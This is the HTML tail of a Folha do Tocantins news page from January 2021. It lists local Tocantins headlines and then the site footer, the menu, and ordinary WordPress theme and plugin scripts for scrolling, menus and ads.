										<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-100-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-100-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-100-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />										<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-100-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-100-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-100-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																			</div><!--mvp-post-more-img-->
																<div class="mvp-post-more-text left relative">
									<div class="mvp-cat-date-wrap left relative">
										<span class="mvp-cd-cat left relative">Geral</span><span class="mvp-cd-date left relative">2 dias ago</span>
									</div><!--mvp-cat-date-wrap-->
									<p>Secretaria da Saúde : Prefeitura de Palmas recebe 3.331 doses da vacina contra a Covid-19</p>
								</div><!--mvp-post-more-text-->
							</li>
							</a>
													<a href="https://folhadotocantins.com.br/165165-2/" rel="bookmark">
							<li>
																	<div class="mvp-post-more-img left relative">
										<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-104-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-104-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-104-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />										<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-104-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-104-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-104-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																			</div><!--mvp-post-more-img-->
																<div class="mvp-post-more-text left relative">
									<div class="mvp-cat-date-wrap left relative">
										<span class="mvp-cd-cat left relative">Cidades</span><span class="mvp-cd-date left relative">2 dias ago</span>
									</div><!--mvp-cat-date-wrap-->
									<p>Após reforma, Unidade de Coleta e Transfusão de Porto Nacional volta suas atividades nesta quarta-feira, 20</p>
								</div><!--mvp-post-more-text-->
							</li>
							</a>
													<a href="https://folhadotocantins.com.br/161516-2/" rel="bookmark">
							<li>
																	<div class="mvp-post-more-img left relative">
										<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-93-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-93-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-93-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />										<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-93-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-93-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-93-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																			</div><!--mvp-post-more-img-->
																<div class="mvp-post-more-text left relative">
									<div class="mvp-cat-date-wrap left relative">
										<span class="mvp-cd-cat left relative">Cidades</span><span class="mvp-cd-date left relative">3 dias ago</span>
									</div><!--mvp-cat-date-wrap-->
									<p>Bombeiros militares resgatam corpos de vítimas de acidente no aterro da ponte de Porto Nacional</p>
								</div><!--mvp-post-more-text-->
							</li>
							</a>
													<a href="https://folhadotocantins.com.br/prefeitura-de-gurupi-deve-implantar-sistema-informatizado-de-matriculas/" rel="bookmark">
							<li>
																	<div class="mvp-post-more-img left relative">
										<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-102-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-102-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-102-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />										<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-102-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-102-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-102-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																			</div><!--mvp-post-more-img-->
																<div class="mvp-post-more-text left relative">
									<div class="mvp-cat-date-wrap left relative">
										<span class="mvp-cd-cat left relative">Cidades</span><span class="mvp-cd-date left relative">2 dias ago</span>
									</div><!--mvp-cat-date-wrap-->
									<p>Prefeitura de Gurupi deve implantar sistema informatizado de matrículas</p>
								</div><!--mvp-post-more-text-->
							</li>
							</a>
													<a href="https://folhadotocantins.com.br/plano-de-acao-para-prevencao-e-controle-do-desmatamento-e-queimadas-e-atualizado-no-estado/" rel="bookmark">
							<li>
																	<div class="mvp-post-more-img left relative">
										<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-81-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-81-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-81-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />										<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-81-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-81-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-81-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																			</div><!--mvp-post-more-img-->
																<div class="mvp-post-more-text left relative">
									<div class="mvp-cat-date-wrap left relative">
										<span class="mvp-cd-cat left relative">Cidades</span><span class="mvp-cd-date left relative">3 dias ago</span>
									</div><!--mvp-cat-date-wrap-->
									<p>Plano de Ação para Prevenção e Controle do Desmatamento e Queimadas é atualizado no Estado</p>
								</div><!--mvp-post-more-text-->
							</li>
							</a>
													<a href="https://folhadotocantins.com.br/coren-to-defende-prioridade-na-vacinacao-dos-profissionais-da-saude/" rel="bookmark">
							<li>
																	<div class="mvp-post-more-img left relative">
										<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-77-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-77-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-77-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />										<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-77-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-77-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-77-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																			</div><!--mvp-post-more-img-->
																<div class="mvp-post-more-text left relative">
									<div class="mvp-cat-date-wrap left relative">
										<span class="mvp-cd-cat left relative">Estado</span><span class="mvp-cd-date left relative">3 dias ago</span>
									</div><!--mvp-cat-date-wrap-->
									<p>Coren-TO defende prioridade na vacinação dos profissionais da saúde</p>
								</div><!--mvp-post-more-text-->
							</li>
							</a>
													<a href="https://folhadotocantins.com.br/777771263-2/" rel="bookmark">
							<li>
																	<div class="mvp-post-more-img left relative">
										<img width="400" height="240" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-117-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-117-400x240.jpg 400w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-117-590x354.jpg 590w" sizes="(max-width: 400px) 100vw, 400px" />										<img width="80" height="80" src="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-117-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" loading="lazy" srcset="https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-117-80x80.jpg 80w, https://folhadotocantins.com.br/wp-content/uploads/2021/01/porto-nacional-palmas-paraiso-do-tocantins-estado-do-tocantins-gurupi-noticias-de-tocantins-noticias-do-tocantins-117-150x150.jpg 150w" sizes="(max-width: 80px) 100vw, 80px" />																			</div><!--mvp-post-more-img-->
																<div class="mvp-post-more-text left relative">
									<div class="mvp-cat-date-wrap left relative">
										<span class="mvp-cd-cat left relative">Cidades</span><span class="mvp-cd-date left relative">18 horas ago</span>
									</div><!--mvp-cat-date-wrap-->
									<p>No último ano, BRK Ambiental retirou 710 toneladas de lixo das redes de esgoto em Palmas</p>
								</div><!--mvp-post-more-text-->
							</li>
							</a>
											</ul>
				</div><!--mvp-post-more-wrap-->
						</div><!--mvp-main-box-->
		</div><!--mvp-article-cont-->
		</article><!--mvp-article-wrap-->
			</div><!--mvp-main-body-wrap-->
			<footer id="mvp-foot-wrap" class="left relative">
				<div id="mvp-foot-top" class="left relative">
					<div class="mvp-main-box">
						<div id="mvp-foot-logo" class="left relative">
															<a href="https://folhadotocantins.com.br/"><img src="https://folhadotocantins.com.br/wp-content/uploads/2018/08/logofolhadotocantins.png" alt="Folha do Tocantins" data-rjs="2" /></a>
													</div><!--mvp-foot-logo-->
						<div id="mvp-foot-soc" class="left relative">
							<ul class="mvp-foot-soc-list left relative">
																	<li><a href="https://www.facebook.com/folhadotocantins/" target="_blank" class="fa fa-facebook fa-2"></a></li>
																																																																							</ul>
						</div><!--mvp-foot-soc-->
						<div id="mvp-foot-menu-wrap" class="left relative">
							<div id="mvp-foot-menu" class="left relative">
								<div class="menu-01-menu-principal-container"><ul id="menu-01-menu-principal-2" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16"><a title="Página Inicial" href="/">Início</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-54"><a href="https://folhadotocantins.com.br/geral/">Geral</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-58"><a href="https://folhadotocantins.com.br/saude/">Saúde</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50"><a href="https://folhadotocantins.com.br/cultura/">Cultura</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-56"><a href="https://folhadotocantins.com.br/esporte/">Esporte</a></li>
</ul>
</li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-47"><a href="https://folhadotocantins.com.br/cidades/">Cidades</a></li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-44"><a href="https://folhadotocantins.com.br/estado/">Estado</a></li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-48"><a href="https://folhadotocantins.com.br/brasil/">Brasil</a></li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-45"><a href="https://folhadotocantins.com.br/politica/">Política</a></li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-51"><a href="https://folhadotocantins.com.br/curtas/">Curtas</a></li>
<li class="mvp-mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-52"><a href="https://folhadotocantins.com.br/blog-ft/">Contexto Gospel</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-60"><a href="https://folhadotocantins.com.br/policia/">Polícia</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-283"><a href="https://folhadotocantins.com.br/videos/">Cinema</a></li>
</ul></div>							</div><!--mvp-foot-menu-->
						</div><!--mvp-foot-menu-wrap-->
					</div><!--mvp-main-box-->
				</div><!--mvp-foot-top-->
				<div id="mvp-foot-bot" class="left relative">
					<div class="mvp-main-box">
						<div id="mvp-foot-copy" class="left relative">
							<p>Copyright © 2008 - 2021 Folha do Tocantins. Todos os direitos reservados.<br>É proibida a reprodução do conteúdo desta página em qualquer meio de comunicação, eletrônico ou impresso, sem autorização escrita.</p>
						</div><!--mvp-foot-copy-->
					</div><!--mvp-main-box-->
				</div><!--mvp-foot-bot-->
			</footer>
		</div><!--mvp-site-main-->
	</div><!--mvp-site-wall-->
</div><!--mvp-site-->
<div class="mvp-fly-top back-to-top">
	<i class="fa fa-angle-up fa-3"></i>
</div><!--mvp-fly-top-->
<div class="mvp-fly-fade mvp-fly-but-click">
</div><!--mvp-fly-fade-->
		<div data-theiaStickySidebar-sidebarSelector='"#mvp-side-wrap,.mvp-feat1-right-wrap,.mvp-post-soc-wrap,.mvp-flex-side-wrap"'
		     data-theiaStickySidebar-options='{"containerSelector":"","additionalMarginTop":120,"additionalMarginBottom":20,"updateSidebarHeight":false,"minWidth":1004,"sidebarBehavior":"modern","disableOnResponsiveLayouts":true}'></div>
			<div id="fb-root"></div>
	<script type='text/javascript' id='jshowoff-adrotate-js-extra'>
/* <![CDATA[ */
var impression_object = {"ajax_url":"https:\/\/folhadotocantins.com.br\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/plugins/adrotate/library/jquery.adrotate.dyngroup.js' id='jshowoff-adrotate-js'></script>
<script type='text/javascript' id='clicktrack-adrotate-js-extra'>
/* <![CDATA[ */
var click_object = {"ajax_url":"https:\/\/folhadotocantins.com.br\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/plugins/adrotate/library/jquery.adrotate.clicktracker.js' id='clicktrack-adrotate-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/plugins/theia-sticky-sidebar/js/ResizeSensor.js?ver=1.7.0' id='theia-sticky-sidebar/ResizeSensor.js-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/plugins/theia-sticky-sidebar/js/theia-sticky-sidebar.js?ver=1.7.0' id='theia-sticky-sidebar/theia-sticky-sidebar.js-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/plugins/theia-sticky-sidebar/js/main.js?ver=1.7.0' id='theia-sticky-sidebar/main.js-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/themes/zox-news/js/mvpcustom.js?ver=5.5.2' id='mvp-custom-js'></script>
<script type='text/javascript' id='mvp-custom-js-after'>

	jQuery(document).ready(function($) {
	$(window).load(function(){
	var leaderHeight = $("#mvp-leader-wrap").outerHeight();
	var logoHeight = $("#mvp-main-nav-top").outerHeight();
	var botHeight = $("#mvp-main-nav-bot").outerHeight();
	var navHeight = $("#mvp-main-head-wrap").outerHeight();
	var headerHeight = navHeight + leaderHeight;
	var aboveNav = leaderHeight + logoHeight;
	var totalHeight = logoHeight + botHeight;
	var previousScroll = 0;
	$(window).scroll(function(event){
			var scroll = $(this).scrollTop();
			if ($(window).scrollTop() > aboveNav){
				$("#mvp-main-nav-top").addClass("mvp-nav-small");
				$("#mvp-main-nav-bot").css("margin-top", logoHeight );
			} else {
				$("#mvp-main-nav-top").removeClass("mvp-nav-small");
				$("#mvp-main-nav-bot").css("margin-top","0");
			}
			if ($(window).scrollTop() > headerHeight){
				$("#mvp-main-nav-top").addClass("mvp-fixed");
				$("#mvp-main-nav-bot").addClass("mvp-fixed1");
				$("#mvp-main-body-wrap").css("margin-top", totalHeight );
				$("#mvp-main-nav-top").addClass("mvp-fixed-shadow");
				$(".mvp-nav-top-mid").addClass("mvp-fixed-post");
				$(".mvp-drop-nav-title").show();
				$(".mvp-fly-top").addClass("mvp-to-top");
	    		if(scroll < previousScroll) {
					$("#mvp-main-nav-bot").addClass("mvp-fixed2");
					$("#mvp-main-nav-top").removeClass("mvp-fixed-shadow");
					$("#mvp-main-nav-top").removeClass("mvp-soc-mob-up");
					$("#mvp-soc-mob-wrap").removeClass("mvp-soc-mob-up");
				} else {
					$("#mvp-main-nav-bot").removeClass("mvp-fixed2");
					$("#mvp-main-nav-top").addClass("mvp-fixed-shadow");
					$("#mvp-main-nav-top").addClass("mvp-soc-mob-up");
					$("#mvp-soc-mob-wrap").addClass("mvp-soc-mob-up");
				}
			} else {
				$("#mvp-main-nav-top").removeClass("mvp-fixed");
				$("#mvp-main-nav-bot").removeClass("mvp-fixed1");
				$("#mvp-main-nav-bot").removeClass("mvp-fixed2");
				$("#mvp-main-body-wrap").css("margin-top","0");
				$("#mvp-main-nav-top").removeClass("mvp-fixed-shadow");
				$(".mvp-nav-top-mid").removeClass("mvp-fixed-post");
				$(".mvp-drop-nav-title").hide();
	    		$(".mvp-fly-top").removeClass("mvp-to-top");
			}
			previousScroll = scroll;
	});
	});
	});
	

	jQuery(document).ready(function($) {
	$(".menu-item-has-children a").click(function(event){
	  event.stopPropagation();

  	});

	$(".menu-item-has-children").click(function(){
    	  $(this).addClass("toggled");
    	  if($(".menu-item-has-children").hasClass("toggled"))
    	  {
    	  $(this).children("ul").toggle();
	  $(".mvp-fly-nav-menu").getNiceScroll().resize();
	  }
	  $(this).toggleClass("tog-minus");
    	  return false;
  	});

	// Main Menu Scroll
	$(window).load(function(){
	  $(".mvp-fly-nav-menu").niceScroll({cursorcolor:"#888",cursorwidth: 7,cursorborder: 0,zindex:999999});
	});
	});
	

	jQuery(document).ready(function($) {
	$(".infinite-content").infinitescroll({
	  navSelector: ".mvp-nav-links",
	  nextSelector: ".mvp-nav-links a:first",
	  itemSelector: ".infinite-post",
	  errorCallback: function(){ $(".mvp-inf-more-but").css("display", "none") }
	});
	$(window).unbind(".infscr");
	$(".mvp-inf-more-but").click(function(){
   		$(".infinite-content").infinitescroll("retrieve");
        	return false;
	});
	$(window).load(function(){
		if ($(".mvp-nav-links a").length) {
			$(".mvp-inf-more-but").css("display","inline-block");
		} else {
			$(".mvp-inf-more-but").css("display","none");
		}
	});
	});
	
</script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/themes/zox-news/js/scripts.js?ver=5.5.2' id='zoxnews-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/themes/zox-news/js/retina.js?ver=5.5.2' id='retina-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/themes/zox-news/js/flexslider.js?ver=5.5.2' id='flexslider-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/themes/zox-news/js/jquery.infinitescroll.min.js?ver=5.5.2' id='infinitescroll-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-includes/js/comment-reply.min.js?ver=5.5.2' id='comment-reply-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/plugins/super-socializer/js/front/social_login/general.js?ver=7.13.5' id='the_champ_ss_general_scripts-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/plugins/super-socializer/js/front/facebook/sdk.js?ver=7.13.5' id='the_champ_fb_sdk-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/plugins/super-socializer/js/front/facebook/commenting.js?ver=7.13.5' id='the_champ_fb_commenting-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-content/plugins/super-socializer/js/front/sharing/sharing.js?ver=7.13.5' id='the_champ_share_counts-js'></script>
<script type='text/javascript' src='https://folhadotocantins.com.br/wp-includes/js/wp-embed.min.js?ver=5.5.2' id='wp-embed-js'></script>
<script async="async" type='text/javascript' src='https://folhadotocantins.com.br/wp-content/plugins/akismet/_inc/form.js?ver=4.1.6' id='akismet-form-js'></script>
<!-- AdRotate JS -->
<script type="text/javascript">
jQuery(document).ready(function(){
if(jQuery.fn.gslider) {
	jQuery('.g-1').gslider({ groupid: 1, speed: 6000 });
	jQuery('.g-2').gslider({ groupid: 2, speed: 6000 });
	jQuery('.g-3').gslider({ groupid: 3, speed: 6000 });
}
});
</script>
<!-- /AdRotate JS -->

</body>
</html>
<!--Cached using Nginx-Helper on 2021-01-21 23:57:05. It took 296 queries executed in 0,172 seconds.-->
<!--Visit http://wordpress.org/extend/plugins/nginx-helper/faq/ for more details-->